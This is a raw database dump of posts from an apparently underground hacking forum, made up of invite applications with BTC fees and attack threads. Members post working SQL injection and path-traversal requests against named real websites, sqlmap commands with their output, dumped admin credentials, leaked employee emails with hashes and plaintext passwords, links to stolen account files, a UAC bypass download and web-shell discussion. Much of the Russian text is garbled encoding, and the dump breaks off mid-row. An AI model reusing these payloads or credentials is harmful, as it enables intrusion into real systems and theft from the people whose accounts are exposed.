'181.40.78.42', 0, 1, 0, 0, 0), (1308, 1205, 1306, 'Psych0tr1a', 11, '', 1405957495, 'icq: 277777777\r\njabber: [email]Psych0tr1a@jabber.cz[/email]\r\ne-mail: [email]w@inbox.ru[/email]', 1, 0, '91.78.171.217', 0, 1, 0, 0, 0), (1309, 1205, 1308, 'hackdays', 23, '', 1405957647, 'Jabber: [email]hackdays@exploit.im[/email]', 1, 0, '119.81.9.17', 0, 1, 0, 0, 0), (1310, 1208, 0, 'Invite', 2, 'New invite', 1405968883, '[b]Name[/b]: Boeira\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: me@marceloboeira.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '189.30.233.135', 0, 1, 0, 0, 0), (1311, 1209, 0, 'Invite', 2, 'New invite', 1406012552, '[b]Name[/b]: Errorz\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: error@jabber.at\r\n [b]e-mail[/b]: Fad3sniFF@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '68.41.117.54', 0, 1, 0, 0, 0), (1312, 1210, 0, 'Invite', 2, 'New invite', 1406031571, '[b]Name[/b]: Nickname\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: Email\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '95.211.174.70', 0, 1, 0, 0, 0), (1314, 1205, 1309, 'Ereee', 19, '', 1406049840, 'Ereee\r\nICQ 27795', 1, 0, '95.141.43.237', 0, 1, 0, 0, 0), (1315, 1211, 0, 'Psych0tr1a', 11, 'donbass.ua', 1406059855, '[B]IP хþÑÂтð:[/B]\r\n[code]91.229.78.2[/code]\r\n\r\n[B]Ãâ€Ã¾Ã¼ÃµÃ½Ñ‹ ýð ýõü:[/B]\r\n[code]donbass.ua\r\nold.donbass.ua\r\npda.donbass.ua\r\nwww.donbass.ua[/code]\r\n\r\n[B]Úðчðõüыù .htaccess [/B]\r\n[code]http://91.229.78.2/.htaccess[/code]\r\n\r\n[B]SQLi[/B]\r\n[code]http://old.donbass.ua/news.php?type=-2\'+union+select+1,load_file(\'/etc/passwd\'),3,4+--+[/code]\r\n\r\nÃâ€Ã°Ã½Ã½Ñ‹Ãµ ôûѠòхþôð ò ðôüøýþчúу:\r\n[code]Data Found: login,passw,admin=ad_web^1A2N@_new^1\r\nData Found: login,passw,admin=REDucka^!geRb1^1\r\nData Found: login,passw,admin=web_2^21bs19HL@Sm^1[/code]\r\n\r\nÃÂð ÑÂõрòõ ýðшûøÑÂÑŒ фðùûøúø:\r\n[code]/etc/php5/apache2/php.ini\r\n/etc/proftpd/proftpd.conf\r\netc/mysql/my.conf\r\n\r\n[/code]\r\n\r\nýуöýþ ýðùтø httpd.conf øûø õüу ÿþôþñýыù фðùû\r\n\r\nà ðÑÂúрытøѠÿþúð ýõт ýþ òþ÷üþöýþ ÿþÑÂòøтÑÂѠúþóôð òúûючðт þÑÂтðûьýыõ ôþüõýы.\r\n\r\nßðÿþчúø:\r\n[code]\r\nhttp://old.donbass.ua/admin/\r\nhttp://old.donbass.ua/admin/css/\r\nhttp://old.donbass.ua/admin/lib/\r\nhttp://old.donbass.ua/admin/modules/\r\nhttp://old.donbass.ua/css/\r\nhttp://old.donbass.ua/download/\r\nhttp://old.donbass.ua/download/file/\r\nhttp://old.donbass.ua/download/image/\r\nhttp://old.donbass.ua/download/test/\r\nhttp://old.donbass.ua/i/\r\nhttp://old.donbass.ua/icons/\r\nhttp://old.donbass.ua/images/\r\nhttp://old.donbass.ua/js/\r\n\r\n\r\n\r\n\r\n\r\n\r\n[/code]\r\n\r\n[code]\r\nhttp://91.229.78.2/doc/\r\nhttp://91.229.78.2/icons/\r\nhttp://91.229.78.2/images/\r\n\r\n\r\n\r\n\r\n\r\n[/code]\r\n\r\n[code]\r\nhttp://donbass.ua/admin/\r\nhttp://donbass.ua/admin/login/\r\nhttp://donbass.ua/admin/modules/\r\nhttp://donbass.ua/css/\r\nhttp://donbass.ua/icons/\r\nhttp://donbass.ua/images/\r\nhttp://donbass.ua/inc/\r\nhttp://donbass.ua/js/\r\nhttp://donbass.ua/templates/\r\nhttp://donbass.ua/templates/admin/\r\nhttp://donbass.ua/templates/admin/navigate/\r\nhttp://donbass.ua/templates/admin/system/filter/\r\nhttp://donbass.ua/templates/admin/system/logs/\r\nhttp://donbass.ua/templates/admin/system/message/\r\nhttp://donbass.ua/templates/admin/system/menu/\r\nhttp://donbass.ua/templates/admin/js/\r\nhttp://donbass.ua/swf/\r\n\r\n\r\n\r\n\r\n[/code]', 1, 0, '91.78.171.217', 0, 1, 0, 0, 0), (1316, 1211, 1315, 'w0rm', 1, '', 1406060171, 'Cûðòð уúрðøýõ, óõрþÑÂü ÑÂûðòð )', 1, 0, '178.45.196.143', 0, 1, 0, 0, 0), (1317, 1211, 1316, 'hackdays', 23, '', 1406087770, 'áûðòð ãúрðøýõ-ÓõрþÑÂü áðûð :rolleyes:', 1, 0, '46.158.43.203', 0, 1, 0, 0, 0), (1318, 1212, 0, 'Invite', 2, 'New invite', 1406097812, '[b]Name[/b]: m0\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 8112323\r\n [b]e-mail[/b]: evren@superbug.co\r\n [b]Info[/b]: exploit dev.', 1, 0, '46.196.249.169', 0, 1, 0, 0, 0), (1319, 1213, 0, 'Invite', 2, 'New invite', 1406118025, '[b]Name[/b]: helloaa\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: oyun4@yandex.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '176.10.100.226', 0, 1, 0, 0, 0), (1320, 1214, 0, 'Invite', 2, 'New invite', 1406131030, '[b]Name[/b]: pwnsauce\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: qlmjptlo@sharklasers.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '77.95.225.40', 0, 1, 0, 0, 0), (1321, 1215, 0, 'Invite', 2, 'New invite', 1406135903, '[b]Name[/b]: tejo\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: tejobro1@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '141.0.10.66', 0, 1, 0, 0, 0), (1322, 1216, 0, 'Invite', 2, 'New invite', 1406136813, '[b]Name[/b]: mailme19245\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: mailme19245@w0rm.in\r\n [b]e-mail[/b]: mailme19245@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '88.80.29.41', 0, 1, 0, 0, 0), (1323, 1217, 0, 'Invite', 2, 'New invite', 1406142831, '[b]Name[/b]: Pilot\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: Vpacoinc@jabber.org\r\n [b]e-mail[/b]: Vpacoinc@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '77.37.214.79', 0, 1, 0, 0, 0), (1335, 1222, 0, 'Invite', 2, 'New invite', 1406361292, '[b]Name[/b]: p4cm4n\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: p4cm4n@jabber.ccc.de\r\n [b]e-mail[/b]: Egary1272@gustr.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '197.8.28.169', 0, 1, 0, 0, 0), (1328, 1205, 1314, 'Bo0om', 7, '', 1406186682, 'jab [email]bo0om@onsec.ru[/email]\r\nicq (рõôúþ ò ýõù) 1131111', 1, 0, '90.189.5.12', 0, 1, 0, 0, 0), (1329, 1219, 0, 'Invite', 2, 'New invite', 1406198023, '[b]Name[/b]: DouAda\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: doad_51@yahoo.co.uk\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '194.8.124.3', 0, 1, 0, 0, 0), (1333, 1221, 0, 'Invite', 2, 'New invite', 1406322468, '[b]Name[/b]: attila\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: geciciuser@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '88.233.18.38', 0, 1, 0, 0, 0), (1332, 1220, 0, 'Invite', 2, 'New invite', 1406262169, '[b]Name[/b]: r0x0rm3\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: r0x0rm3.n3p@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '182.50.66.67', 0, 1, 0, 0, 0), (1336, 1223, 0, 'Invite', 2, 'New invite', 1406843333, '[b]Name[/b]: 222\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 22222\r\n [b]e-mail[/b]: 222\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '178.32.181.105', 0, 1, 0, 0, 0), (1337, 1064, 1097, 'w0rm', 1, '', 1406852122, 'ÃÂþòыù ÷ðúð÷:[B]neoline.biz[/B]\r\nýуöýþ: øх óøт + шõûы/ñð÷ы þÿûðтð ÿþ фðúту, ò ÿü ôðü úþýтðúт õÑÂûø úтþ-тþ рð÷рþõт.\r\n\r\nñыûð øýьõúцøÑÂ, уôðûþÑÂÑŒ ôþÑÂтðть ÿðрþûø:\r\n[url]http://mobadmin.neoline.biz/admin/login[/url]\r\n[QUOTE]\r\n\r\nadmin:ac515a19b3ab17c131448de0430f9fce\r\n[email]atimokhin@neoline.biz[/email]:a290114685b5ff62b52669e18ba0051e тõх ôøр\r\n[email]mprisheltsev@neoline.biz[/email]:50d29001bc97655d2984ec29922d2fcd\r\n[email]support@neoline.biz[/email]:57b45453959ab29730ccc945fa884d47 (Soelinz07#$)\r\n[email]mkochurin@neoline.biz[/email] : 62395966c07b08a158d2a4f08d210391 (tQI4I64F)\r\n[email]susenko@neoline.biz[/email]:be763d31b3d7168d7b756ff267c3f91d(4bB3MYTW)\r\n[email]eshishaeva@neoline.biz[/email]:1ba8dfefad73087bb71442424b1daaca(cTyf98HG)\r\n[email]ababkina@neoline.biz[/email]:b9e200a13166d6564bc4e76a1cd856a8 (eyb4xnG0)\r\n[email]lbelyaev@neoline.biz[/email]:23d988b79c1a7cfd689a8085acf641ef (1234543210)\r\n[email]fpostnov@neoline.biz[/email]:1546ca12b21ab6181ac0e9861aa04c43(WNS5id3Q)\r\n[email]ikovalenko@neoline.biz[/email]:a875cba9b4c76cd824f1cc306ad7eded ÿрþóрðüüøÑÂÑ‚\r\n[email]vshilov@neoline.biz[/email]:29234e7850b2214710ce1a81af2094a5\r\n[email]kgrankina@neoline.biz[/email]:86cc74041b7992338d55a63b96b13d35 (28081988)\r\n[/QUOTE]\r\n\r\nýþ øх ÑÂüõýøûø.\r\n\r\nredmine.neoline.com - helpdesk : 87xd4txc232', 1, 0, '195.248.249.154', 0, 1, 0, 0, 0), (1338, 1064, 1337, 'w0rm', 1, '', 1406857118, 'support : Soelinz07#$ ÿþôхþôøт ú фтÿ mx.neoline.biz , ýðшõû тðü ñÑÂúðÿ ÿþûь÷þòðтõûõù ÿþчты, ÿðрþûø ò þтúрытþü òøôõ.\n\n[url]https://cloud.mail.ru/public/f8da5d743734/_Accounts.csv[/url]', 1, 0, '195.248.249.154', 0, 1, 0, 0, 0), (1339, 1224, 0, 'Invite', 2, 'New invite', 1406874474, '[b]Name[/b]: sickninja\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: not-now@a.org\r\n [b]e-mail[/b]: gomuci@alivance.com\r\n [b]Info[/b]: I do hack\r\n\r\nзы на этой неделе ведь рега бесплатная.', 1, 0, '89.122.99.13', 0, 1, 0, 0, 0), (1341, 1225, 0, 'Invite', 2, 'New invite', 1406911885, '[b]Name[/b]: BigBear\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 906047\r\n [b]e-mail[/b]: BigBear2008@yandex.ru\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '91.105.185.0', 0, 1, 0, 0, 0), (1342, 1226, 0, 'Invite', 2, 'New invite', 1406957329, '[b]Name[/b]: checkermint\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: checkermint@lsd-25.ru\r\n [b]e-mail[/b]: checkermint@hellokitty.com\r\n [b]Info[/b]: professional pen tester. want to trade findings. also looking for malware samples..', 1, 0, '62.210.74.186', 0, 1, 0, 0, 0), (1343, 1227, 0, 'w0rm', 1, 'ukr.net', 1407011062, '_ttp://np.ukr.net/validator/pas.php\r\n12345\r\n\r\nýðôþ ñы cgi шõûû ÷ðûøть ø þñþøтø þÿÑÂý ñÑÂùѠôøр.', 1, 0, '178.44.167.25', 0, 1, 0, 0, 0), (1344, 1228, 0, 'Invite', 2, 'New invite', 1407065204, '[b]Name[/b]: kolaw\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: kolaw\r\n [b]e-mail[/b]: kolawilm@mail.ru\r\n [b]Info[/b]: More then 10 years of of experience in vulnerability research, exploit development, reverse-engineering, and cryptography..', 1, 0, '23.238.18.177', 0, 1, 0, 0, 0), (1345, 1229, 0, 'Invite', 2, 'New invite', 1407076981, '[b]Name[/b]: render\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: cray77@mail.ru\r\n [b]e-mail[/b]: cray77@mail.ru\r\n [b]Info[/b]: интересуюсь и занимаюсь вебом (стандартный набор из sql, lfi и т.д.), также копаю win.kernel, бывает есть что продать из баз..', 1, 0, '89.230.77.64', 0, 1, 0, 0, 0), (1346, 1227, 1343, 'x0rg', 30, '', 1407096822, '[QUOTE=w0rm;1343]_ttp://np.ukr.net/validator/pas.php\r\n12345\r\n\r\nýðôþ ñы cgi шõûû ÷ðûøть ø þñþøтø þÿÑÂý ñÑÂùѠôøр.[/QUOTE]\r\n\r\nÃÂð WSO õÑÂть þñхþôы OpenbaseDir ÿрþñþòðû õóþ ÷ðûøòðть?', 1, 0, '188.16.92.90', 0, 1, 0, 0, 0), (1347, 1230, 0, 'Invite', 2, 'New invite', 1407135055, '[b]Name[/b]: tetyys\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: tetyys@dukgo.com\r\n [b]e-mail[/b]: tetyys@tetyys.com\r\n [b]Info[/b]: I\\\'m mostly a developer (C#, PHP, C), but would like to learn more about underground community and also learn Russian. I\\\'m also a moderator on the most popular Lithuanian hacking site. I don\\\'t have much releases for my programming work, because I do mostly private work. I also sometimes reverse-engineer malware for white-hat purposes.\r\nI don\\\'t think I will bring lotsa vulnerabilities and trade them, but I would gladly help on programming forum (if you have one) and mostly lurk..', 1, 0, '77.241.202.203', 0, 1, 0, 0, 0), (1348, 1206, 1305, 'null', 9, '', 1407142299, 'ýу ø úþóôð ÑÂþñõрõüÑÂÑÂ?', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0), (1349, 1231, 0, 'null', 9, 'webinar.actionpay.ru', 1407155324, 'üþöõт úþüу øýтõрõÑÂýþ ñуôõт\r\n\r\n[quote]\r\nhùùp://webinar.actionpay.ru/archive/download.php?type=presentation&path=../../../../../../../../../../../../../../../etc/passwd\r\n[/quote]', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0), (1352, 1232, 0, 'syslink', 13, 'UAC Bypass', 1407256846, 'тõÑÂÑÂтðýуû ýð 8 x64 рðñþтðõт\n[url]https://www.sendspace.com/file/lotats[/url]', 1, 0, '179.43.159.226', 0, 1, 0, 0, 0), (1353, 1233, 0, 'Invite', 2, 'New invite', 1407269479, '[b]Name[/b]: haxorma\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 9393939\r\n [b]e-mail[/b]: haxorma@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n .', 1, 0, '62.43.89.113', 0, 1, 0, 0, 0), (1354, 1206, 1348, 'w0rm', 1, '', 1407289075, 'úтþ хþчõт учðÑÂтòþòðть þтÿøшøтõ тут.', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1355, 1231, 1349, 'awert', 22, '', 1407319670, 'CúуûѠýð ÑÂþÑÂõôÑÂÑ….\n[url]http://teodorus.portal.vestey.ru/ajax/set_voting[/url]\nPOST:\nvi_id=61&v_id=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(88)%2cCHAR(114)%2cCHAR(79)%2cCHAR(90)%2cCHAR(66)%2cCHAR(85)%2cCHAR(115)%2cCHAR(66))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))\n\nÒхþô ò ðôüøýúу тþûьúþ Ѡøÿð ðôüøýð.\n\n[url]http://ladycash.ru/i.php[/url]', 1, 0, '91.219.158.225', 0, 1, 0, 0, 0), (1356, 1083, 1151, 'awert', 22, '', 1407319744, '[quote=unknown_evil;1151]òþт ýþрüðûьýðѠÑÂúуûѠòÑÂõ ôþÑÂтðõтÑÂѠýð урð!\nSqlmap -u \"https://www.employmentcrossing.com/lcactivation.php?activation=d1ddead0a20ed01bc4b916675ae2649c\" --dbs\n\n sqlmap/1.0-dev - automatic sql injection and database takeover tool\n [url]http://sqlmap.org[/url]\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\'s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting at 07:16:21\n\n[07:16:21] [info] resuming back-end dbms \'mysql\'\n[07:16:21] [info] testing connection to the target url\nsqlmap identified the following injection points with a total of 0 http(s) requests:\n---\nplace: Get\nparameter: Activation\n type: Boolean-based blind\n title: And boolean-based blind - where or having clause\n payload: Activation=d1ddead0a20ed01bc4b916675ae2649c\' and 2473=2473 and \'hoiq\'=\'hoiq\n\n type: Union query\n title: Mysql union query (null) - 78 columns\n payload: Activation=-7694\' union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x7179787971,0x6a6d465a61694e4b5353,0x7169747771),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#\n---\n[07:16:25] [info] the back-end dbms is mysql\nweb application technology: Apache\nback-end dbms: Mysql 5\n[07:16:25] [info] fetching database names\n[07:16:28] [info] the sql query used returns 4 entries\n[07:16:31] [info] retrieved: \"information_schema\"\n[07:16:34] [info] retrieved: \"ec_jp\"\n[07:16:37] [info] retrieved: \"sellingcrossing\"\n[07:16:40] [info] retrieved: \"sellingcrossing_external\"\navailable databases [4]:\n[*] ec_jp\n[*] information_schema\n[*] sellingcrossing\n[*] sellingcrossing_external[/quote]\n\nÿрø òыòþôõ úþûþýþú øûø ôðüÿõ òыôðõт þшøñúу, úтþ ÷ýðõт úðú þñþùтø?', 1, 0, '91.219.158.225', 0, 1, 0, 0, 0), (1357, 1083, 1356, 'null', 9, '', 1407320747, '[QUOTE=awert;1356]ÿрø òыòþôõ úþûþýþú øûø ôðüÿõ òыôðõт þшøñúу, úтþ ÷ýðõт úðú þñþùтø?[/QUOTE]\r\n\r\nð þшøñúð úðúðÑÂ?', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0), (1358, 1083, 1357, 'w0rm', 1, '', 1407323620, '[url]http://www.letoile.ru[/url]\n40 000 Ñ€ÑÂ.\n\nýуöýþ:\n[QUOTE]ýþüõрð üþñøûьýыõ, øüÑÂ[/QUOTE]', 1, 0, '96.47.226.20', 0, 1, 0, 0, 0), (1361, 1083, 1357, 'awert', 22, '', 1407375889, '[quote=unknown_evil;1357]ð þшøñúð úðúðÑÂ?[/quote]\r\n\r\nòõрýõõ ôðöõ þшøñúу ýõ ÿþúð÷ыòðõт, ÿрþÑÂтþ òыòþô ýõ øôõт.', 1, 0, '91.219.159.26', 0, 1, 0, 0, 0), (1362, 1083, 1361, 'null', 9, '', 1407385875, '[quote=awert;1361]òõрýõõ ôðöõ þшøñúу ýõ ÿþúð÷ыòðõт, ÿрþÑÂтþ òыòþô ýõ øôõт.[/quote]\r\nÿрþÑÂтþ ÑÂтрðýøцð ÿþ úþтþрþù ñыûð ÑÂúуûѠтõÿõрь рõôøрõúтøтÑÂÑÂ\r\n\r\nýðùôø ôþрúþü òðûøôýую ÑÂтрðýцу ñõ÷ рõôøрõúтð\r\n[quote]inurl:php?activation= site:employmentcrossing.com[/quote]\r\n\r\nýðÿрøüõр\r\n\r\n[quote][url]https://www.employmentcrossing.com/lcactivation.php?refid=1503&activation=d1ddead0a20ed01bc4b916675ae2649c%27[/url][/quote]\r\n\r\nø òÑÂõ ýþрüуûь рðñþтðõт\r\n\r\n[quote]sqlmap -u \"https://www.employmentcrossing.com/lcactivation.php?refid=1503&activation=d1ddead0a20ed01bc4b916675ae2649c\" -d ec_jp --tables\r\n [/quote]', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0), (1363, 1230, 1347, 'syslink', 13, '', 1407426091, 'denided \r\nreason: lack of knowledge', 1, 0, '81.17.18.210', 0, 1, 0, 0, 0), (1364, 1226, 1342, 'syslink', 13, '', 1407426191, 'perminant denied COP', 1, 0, '81.17.18.210', 0, 1, 0, 0, 0), (1365, 1227, 1346, 'w0rm', 1, '', 1407430355, 'wso ÿðûøтÑÂѠøх ÑÂõрòõрþü, open_base_dir ò ûюñþü ÑÂûучðõ фуýúцøѠphp тõ ò cgi рðñþтðть ýõ ñуôõт, ýþ nginx у ýøх úðú тþ ÑÂтрðýýþ ýðÑÂтрþÑÂý чтþ pl ÑÂúрøÿты ÑÂúðчøòðютÑÂѠð ýõ øÑÂÿþûýÑÂÑŽÑ‚ÑÂÑÂ.\n\nýðôþ ñы ÿрþñрутøть:\n\n[php]\n-- phpMyAdmin SQL Dump\n-- version 2.10.0.2\n-- http://www.phpmyadmin.net\n-- \n-- Ã¥þÑÂÑ‚: 127.0.0.3\n-- ÒрõüѠÑÂþ÷ôðýøÑÂ: ÃÂòó 07 2014 ó., 19:47\n-- ÒõрÑÂøѠÑÂõрòõрð: 5.5.30\n-- ÒõрÑÂøѠPHP: 5.4.13\n\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\n\n-- \n-- Ñð÷ð ôðýýых: `bsql`\n-- \n\n-- --------------------------------------------------------\n\n-- \n-- áтруúтурð тðñûøцы `users`\n-- \n\nCREATE TABLE `users` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `login` varchar(40) NOT NULL DEFAULT \'\',\n `passw` varchar(100) NOT NULL DEFAULT \'\',\n `cookie` varchar(32) NOT NULL DEFAULT \'\',\n `vtime` datetime NOT NULL DEFAULT \'0000-00-00 00:00:00\',\n PRIMARY KEY (`id`)\n) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT=\'î÷õры\' AUTO_INCREMENT=77 ;\n\n-- \n-- Ãâ€Ã°Ã¼Ã¿ ôðýýых тðñûøцы `users`\n-- \n\nINSERT INTO `users` (`id`, `login`, `passw`, `cookie`, `vtime`) VALUES \n(1, \'master\', \'b0be1e547f7a5ee3ffd555428b019d9c\', \'\', \'2014-08-07 07:29:43\'),\n(2, \'misha\', \'1b6c9d1b5e84873fbaca267708d16469\', \'\', \'2014-07-18 15:00:00\'),\n(3, \'grisha\', \'deada030e20b7a089e278d27bd875bd4_locked_\', \'\', \'0000-00-00 00:00:00\'),\n(4, \'sharun\', \'da44c4cfb061610b74c646fed8343a8b\', \'\', \'0000-00-00 00:00:00\'),\n(5, \'mbkom\', \'82efc341d8cbe574b745025aa527568f\', \'\', \'2009-09-21 14:46:51\'),\n(6, \'sulya\', \'0d3d201e551d3b54ab61d6d2ed1b5c25_locked_\', \'\', \'0000-00-00 00:00:00\'),\n(7, \'moder1\', \'2837260221cb881b04a0575549c75579\', \'\', \'2010-04-26 22:17:02\'),\n(8, \'moderator1\', \'f409aa34367789f30b5850b63b5df870\', \'\', \'2009-06-01 10:21:35\'),\n(9, \'akella\', \'f67fd85522b4082671feae41509ad7eb\', \'f67fd85522b4082671feae41509ad7eb\', \'2010-05-18 20:17:01\'),\n(10, \'maria\', \'f3717533a90a8ecb1de730050beab052\', \'f3717533a90a8ecb1de730050beab052\', \'2009-02-11 16:56:14\'),\n(11, \'avizenou\', \'983ae9a305b6569a90fbe2a6ea92da3f\', \'\', \'0000-00-00 00:00:00\'),\n(12, \'erezbahat\', \'6f1e91b448716344ba24bc47b88b8d87_locked_\', \'\', \'0000-00-00 00:00:00\'),\n(14, \'julia\', \'4079284fd6664377f6e8247fc1ad9397\', \'\', \'0000-00-00 00:00:00\'),\n(15, \'zomb\', \'b77b6e45cd9c2998c6e461a46218847b\', \'\', \'2013-11-26 07:56:22\'),\n(16, \'moderator2\', \'dc883c6ad08f850811d7289c3f65860d\', \'\', \'0000-00-00 00:00:00\'),\n(17, \'moderator3\', \'c5640ac37b3e2d7de786976a6ec8c493\', \'c5640ac37b3e2d7de786976a6ec8c493\', \'2007-09-17 11:09:57\'),\n(18, \'marina\', \'9df79be2ca0795b0641e8aa3d3f21ffc\', \'\', \'0000-00-00 00:00:00\'),\n(19, \'yevgeniy\', \'e25e799a4a8a51135d4501ba92f79537\', \'\', \'0000-00-00 00:00:00\'),\n(20, \'irina-sem\', \'44ba16d827ca38e7ff99bf5c811a4017\', \'\', \'2010-09-24 11:01:07\'),\n(21, \'moderator4\', \'99631b6d76c4e99300b067033dd32257\', \'\', \'2008-08-28 11:40:17\'),\n(22, \'moderator5\', \'b93818091ad6826e8537122de00fb535\', \'\', 